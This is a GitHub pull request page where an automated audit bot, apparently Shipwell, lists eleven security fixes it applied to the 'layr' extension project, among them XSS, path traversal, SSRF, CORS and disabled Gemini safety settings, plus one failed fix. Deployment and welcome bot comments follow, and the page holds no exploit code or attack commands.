fix: apply 11 Shipwell audit findings

[shipwellhq]

🛠️ Shipwell Auto-Fix: audit

Automated fixes generated by Shipwell analysis.

✅ Applied Fixes (11)

Severity	Finding	Files
⚪ info	XSS via Template Injection in Template Browser Webview	src/templates/templateBrowser.ts, src/templates/templateManager.ts, src/version-control/HistoryView.ts
⚪ info	Wildcard CORS on API Proxy Allows Abuse from Any Origin	api-proxy/vercel.json, api-proxy/api/chat.js, src/planner/providers/groq.ts
⚪ info	Information Disclosure: Internal Error Details Leaked to Client in API Proxy	api-proxy/api/chat.js
⚪ info	Path Traversal in VersionManager.getVersion and deleteVersion	src/version-control/VersionManager.ts, src/version-control/HistoryView.ts, src/version-control/diffProvider.ts
⚪ info	Sensitive Environment Variable Loading with Debug Logging of API Key Presence	src/extension.ts, src/planner/index.ts, src/utils/logger.ts
⚪ info	Unvalidated User Input in AI Prompts Enables Prompt Injection	src/planner/providers/groq.ts, src/planner/providers/gemini.ts, src/planner/providers/ollama.ts
⚪ info	HTML Export Vulnerable to Stored XSS via Markdown Content	src/extension.ts
⚪ info	Gemini Safety Settings Disabled (BLOCK_NONE for All Harm Categories)	src/planner/ai.ts, src/planner/providers/gemini.ts
⚪ info	SSRF Risk via Configurable Ollama Base URL	src/planner/providers/ollama.ts, src/planner/providers/factory.ts
⚪ info	Template ID Generation Allows File System Manipulation	src/templates/templateManager.ts
⚪ info	Proxy URL Configurable via Environment Variable Without Validation	src/planner/providers/groq.ts

Finding details

⚪ XSS via Template Injection in Template Browser Webview

Category: security
Files: src/templates/templateBrowser.ts, src/templates/templateManager.ts, src/version-control/HistoryView.ts

⚪ Wildcard CORS on API Proxy Allows Abuse from Any Origin

Category: security
Files: api-proxy/vercel.json, api-proxy/api/chat.js, src/planner/providers/groq.ts

⚪ Information Disclosure: Internal Error Details Leaked to Client in API Proxy

Category: security
Files: api-proxy/api/chat.js

⚪ Path Traversal in VersionManager.getVersion and deleteVersion

Category: security
Files: src/version-control/VersionManager.ts, src/version-control/HistoryView.ts, src/version-control/diffProvider.ts

⚪ Sensitive Environment Variable Loading with Debug Logging of API Key Presence

Category: security
Files: src/extension.ts, src/planner/index.ts, src/utils/logger.ts

⚪ Unvalidated User Input in AI Prompts Enables Prompt Injection

Category: security
Files: src/planner/providers/groq.ts, src/planner/providers/gemini.ts, src/planner/providers/ollama.ts

⚪ HTML Export Vulnerable to Stored XSS via Markdown Content

Category: security
Files: src/extension.ts

⚪ Gemini Safety Settings Disabled (BLOCK_NONE for All Harm Categories)

Category: security
Files: src/planner/ai.ts, src/planner/providers/gemini.ts

⚪ SSRF Risk via Configurable Ollama Base URL

Category: security
Files: src/planner/providers/ollama.ts, src/planner/providers/factory.ts

⚪ Template ID Generation Allows File System Manipulation

Category: security
Files: src/templates/templateManager.ts

⚪ Proxy URL Configurable via Environment Variable Without Validation

Category: security
Files: src/planner/providers/groq.ts

❌ Failed (1)

• ⚪ Webview Content Security Policy Missing — Could not match hunk at line 97 in src/templates/templateBrowser.ts

---

Generated by Shipwell 🚢

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
layr	Ready	Preview, Comment	Feb 16, 2026 9:29am

[github-actions]

Hi @ShipwellHQ[bot]! 👋

Thanks for contributing to layr! 🎉
We appreciate your effort and will review your changes soon.

---

⭐ Please star the repo if you like it!
👤 Follow the owner for updates.